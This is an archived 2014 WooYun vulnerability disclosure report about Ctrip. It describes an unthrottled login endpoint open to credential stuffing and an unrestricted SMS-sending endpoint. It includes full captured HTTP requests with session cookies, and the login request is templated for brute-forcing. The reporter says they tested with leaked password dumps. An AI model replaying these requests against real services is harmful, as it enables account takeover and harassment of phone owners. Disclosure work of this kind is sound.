乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-11-11: 细节已通知厂商并且等待厂商处理中 2014-11-11: 厂商已经确认,细节仅向厂商公开 2014-11-21: 细节向核心白帽子及相关领域专家公开 2014-12-01: 细节向普通白帽子公开 2014-12-11: 细节向实习白帽子公开 2014-12-26: 细节向公众公开
接口1、登陆接口未防护,导致可撞库,大量用户密码可被猜解。接口2、短信接口未控制,导致短信轰炸。然后我想说,厂商,看这里:$$$
BUG1、问题接口:https://accounts.ctrip.com/globalwap/account/login/基本上其他国家的WAP页面登陆口都在这里进行验证的,但是没做任何的限制登录时抓取数据包:
POST /globalwap/account/login/ HTTP/1.1Host: accounts.ctrip.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: https://accounts.ctrip.com/globalwap/account/login/Cookie: _abtest_=3341568a-da13-431e-8b37-57b88470cf4c; _bfa=1.1222595445370.18yv31.1.1415607878326.1415670913381.3.426; _jzqco=%7C%7C%7C%7C1415599563950%7C1.1614112599.1415595504733.1415670919253.1415671025719.1415670919253.1415671025719.0.0.0.82.82; __zpspc=9.8.1415670919.1415671025.2%231%7C%7C%7C%7C%7C%23; __utma=1.1094494190.1415595506.1415611614.1415670919.2; __utmz=1.1415611614.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _ga=GA1.2.10922190.1415595506; LoginStatus=1%7czfhtiysc15im2huhnfiy1jnq480123%2c; Union=AllianceID=10530&SID=333189&OUID=000401app-96; Session=SmartLinkCode=222&SmartLinkKeyWord=&SmartLinkQuary=&SmartLinkHost=&SmartLinkLanguage=zh; zdata=zdata=fbtJpBv9C0ehaHww5dt8ARz60iM=; bid=bid=F; Customer=HAL=ctrip_en; TraceSessionEx=E787F98E577C6F54D7617658F2BF7756; login_type=0; login_uid=920F895E064728DE01786; StartCity_Pkg=PkgStartCity=28; OrderCountForMyCtrip=NotravelOrderCount=0&UnSubmitOrderCount=0&WaitAllReviewCount=0&WaitReviewOrderCount=0&WaitTravelOrderCount=0; WAPACHOST=de.ctrip.com; WAPACLANG=de; WAPACBACK=; __utma=1.1094494192215595506.1415611614.1415670919.2; __utmz=1.14152.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TracingUserFlag=ab461c5bfe83ae82; TracingErrorFlag=8b15a8523781bcb8; TracingUserFlag=; M133664218=6; _abtest_userid=17f7299f-dac6-459c-bb15-31af7030162d; ticket_ctrip=uoeOwviAJ6VQEgTNwLuTqSV9j/bS+aOP3Riia12QZsD2giTsSgRspVxT9gVTWKAxJ4HkD23fApqQ3QMOE5IaeSosSdj/B3EvFJUBZysEweyWgXWo5xMG3TUgsErz5oLdCian0tw0kzvhAoK6dTc3++u1ZIAWd2eGOCM0/XmfsdolFtzXzgHfvXqOHZ54WcGrBSN2WW2cLo6BkwPpv5BLIPjgaTJ/9x8PPkNgZ/uhrs82GPpb3azYzoaTdBIbzJW6VCLWjA==; corpid=; corpname=; CtripUserInfo=VipGrade=0&UserName=%c2b%aa%ce%fb%ce%fb%22eadMessageCount=0&U=A58C63A452CFD6E6F68962A25FC; AHeadUserInfo=VipGrade=0&UserName=%c2%aa%ce%fb%ce%fb%2f&NoReadMessageCount=0&U=A22CFD6E6F68962A25FC; auto=FD846C1C8F1C7AA17FEA3A964F6A499CB9D01E6030DD50D5; TicketSiteID=SiteID=1005; _bfs=1.7; _bfi=p1%32003%26p2%3D100111%21%3D426%26v2%3D425; __utmb=1.3.10.1415670919; __utmc=1; __utmt=1; NSC_WT_Bddpvout_443=ffffffff09001c7445525d5f4f58455e445a4a423660; NSC_WT_Bddpvout_80=ffffffff09001c2045525d5f4f58455e445a4a423660; NSC_WT_bddpvout.hmpcbm_443=ffffffff09001c2b45525d5f4f58455e445a4a423660; __utmb=1.3.10.1415670919; __utmc=1Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 39UserName=§15555555555§&Password=§111111111§
这里使用互联网的流出的裤子进行撞库,仅使用了一小部分数据进行测试,成功率非常大。BUG2、短信接口未限制,可导致短信轰炸:
GET /card/ajax/AjaxSendCommonSms.aspx?tempid=0.6355477791943324&typeKey=Register&uid=&mp=15555555555&sendType=1 HTTP/1.1Host: b.ctrip.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0Accept: */*Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestReferer: http://b.ctrip.com/card/Register/Register3.aspx?phone=13888888888Cookie: NSC_WT_C_80=fffddd2245525d5f4f58455e445a4a423660; ASP.NET_SessionId=5b3c5m4d0wbddddtgb3m; _abtest_=3341568a-da13-431e-8b37-57b88470cf4c; _bfa=1.1415595445370.18yv31.1.1415dd445370.1415595445370.1.5; _bfs=1.5; _bfi=p1%3D0%26ddd5%26v2%3D4; _jzqco=%7C%7C%7C%7C%7C1.1614112599.1415dd504733.1415595504733.1415595504734.1415dd95504733.1415595504734.0.0.0.1.1; __zpspc=9.1.1415595504.1415595504.1%234%7C%7C%7C%7C%7C%23; __utma=1.1094494190.1415595506.1415595506.1415595506.1; __utmb=1.2.10.1415595506; __utmc=1; __utmz=1.1415595506.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; corpname=; CoCode=; CtripUserId=; corpid=; _ga=GA1.2.1094494190.1415595506; _gat=1Connection: keep-alive
此短信接口无任何限制.....
在登陆接口加个验证吧
危害等级:低
漏洞Rank:1
确认时间:2014-11-11 11:53
撞库漏洞在本月7号已经有白帽子提交过,所以您提交的撞库漏洞只能按照忽略处理。短信轰炸漏洞经过确认存在且此前无人提交过。十分感谢您的提交。
暂无